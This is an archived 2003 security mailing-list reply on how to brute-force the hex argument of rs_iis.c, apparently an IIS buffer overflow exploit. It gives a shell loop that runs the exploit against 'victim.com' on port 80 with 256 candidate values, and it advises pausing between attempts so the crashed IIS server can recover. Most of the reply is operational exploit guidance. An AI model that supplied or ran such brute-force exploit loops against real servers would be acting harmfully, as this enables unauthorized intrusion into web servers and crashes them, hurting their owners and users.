|
Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com |
Re: Generating Hex Numbers to brute force rs_iis.c
From: Joe Stewart (jstewart
lurhq.com)
Date: Tue Apr 01 2003 - 14:32:57 CST
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
On Monday 31 March 2003 10:14 am, Jeremy Junginger wrote:
> Basically, the goal is as follows:
>
> 1) generate Hex Numbers from 0x0000 to 0xffff in the following pattern
> (0x0000 0x0101 0x0202...0xfdfd 0xfefe 0xffff)
> 2) pass the output to rs_iis via system() command?
How about just running it from your shell like:
for i in `perl -e 'for (0..255) { printf "0x%02x%02x\n", $_, $_ }'`; do \
./rs_iis victim.com 80 31337 $i; done
Remember that IIS will need time to recover from the crash caused by the
overflow, so you may need to sleep for some period of time between tries.
-Joe
--
Joe Stewart, GCIH
Senior Intrusion Analyst
LURHQ Corporation
http://www.lurhq.com/
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]